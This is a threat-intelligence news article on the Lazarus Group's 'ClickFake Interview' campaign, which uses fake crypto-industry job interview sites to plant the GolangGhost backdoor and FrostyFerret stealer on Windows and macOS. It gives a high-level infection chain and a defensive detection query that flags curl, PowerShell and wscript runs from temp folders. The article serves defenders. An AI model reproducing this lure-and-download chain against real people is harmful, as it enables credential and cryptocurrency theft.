ClickFake Interview – Lazarus Hackers Exploit Windows & macOS Users Fake Job Campaign

The Lazarus Group, a North Korean state-sponsored hacking collective, has launched a new campaign dubbed ClickFake Interview, targeting job seekers in the cryptocurrency industry.

This malicious operation uses fake job interview websites to deploy a Go-based backdoor, known as GolangGhost, on both Windows and macOS systems.

The campaign represents an evolution of the previously documented Contagious Interview campaign, showcasing Lazarus’ adaptability and persistent focus on exploiting the cryptocurrency ecosystem.

Lazarus has been active since at least 2009, conducting cyber espionage and financial operations to support North Korea’s missile and nuclear programs.

Since 2017, the group has increasingly targeted cryptocurrency entities, leveraging malware, supply chain attacks, trojanized applications, and fake job offers.

In March 2025, Lazarus executed the largest crypto heist in history, stealing $1.5 billion from Bybit, a UAE-based exchange—an attack that highlights its growing sophistication.

ClickFake Interview Campaign

The ClickFake Interview campaign builds upon the tactics of Contagious Interview, which targeted software developers via fake job interviews conducted on platforms like LinkedIn or X (formerly Twitter).

In this new campaign, attackers lure victims to fake interview websites crafted using ReactJS. These sites feature dynamic content loaded from JavaScript files and simulate legitimate recruitment processes.

Victims are asked to fill out forms, answer cryptocurrency-related questions, and enable their cameras for interviews.

At a critical point in the process, an error message prompts them to download drivers or scripts—initiating the infection chain.

The infection chain varies depending on the operating system:

• Windows: A Visual Basic Script (VBS) downloads a NodeJS-based payload (nvidia.js) that extracts malicious components into temporary directories. Persistence is established via registry keys, and a batch file silently launches the GolangGhost backdoor.
• macOS: A Bash script (coremedia.sh) downloads and extracts malicious files while creating a launch agent plist file for persistence. Before deploying GolangGhost, a stealer named FrostyFerret retrieves system passwords by mimicking Chrome’s UI.

The GolangGhost implant enables remote control and data theft across both platforms. It can execute shell commands, upload/download files, steal browser data (via HackBrowserData), and exfiltrate sensitive information such as system credentials.

Communication with command-and-control (C2) servers is encrypted using RC4 encryption. The malware ensures only one instance runs at a time by storing unique identifiers in temporary files.

Targeting Centralized Finance (CeFi)

Analysis of fake interview websites revealed that Lazarus primarily targets centralized finance (CeFi) entities like Coinbase, Kraken, Bybit, and Robinhood.

Unlike earlier campaigns focused on decentralized finance (DeFi), this shift aligns with DPRK threat actors’ growing interest in CeFi platforms due to their reliance on intermediaries for transactions.

Additionally, job roles advertised in these fake interviews target non-technical profiles such as managers in business development or asset management individuals less likely to detect malicious activity during interviews.

The infection chain relies heavily on sequential execution of commands within short time frames.

Detection opportunities include monitoring unusual script execution patterns via tools like Sigma correlation rules or Sekoia Operating Language (SOL) queries.

For example:

textevents
| where timestamp >= ago(7d)
| where process.command_line contains~ "temp"
| where process.name in ["curl.exe", "powershell.exe", "wscript.exe"]
| aggregate cmd_line = make_set(process.command_line) by host.name, process.parent.pid

Additionally, analyzing registry keys for suspicious entries like cmd.exe can help identify compromised systems.

The ClickFake Interview campaign underscores Lazarus’ adaptability and sophistication in targeting cryptocurrency entities.

By leveraging fake job offers and evolving tactics like ClickFix, the group continues to pose significant threats to centralized finance platforms globally.

Its focus on non-technical employees suggests a strategic pivot aimed at exploiting less vigilant targets while maintaining its overarching goal of financial gain for North Korea.

Are You from SOC/DFIR Team? - Try Free Malware Research with ANY.RUN - Start Now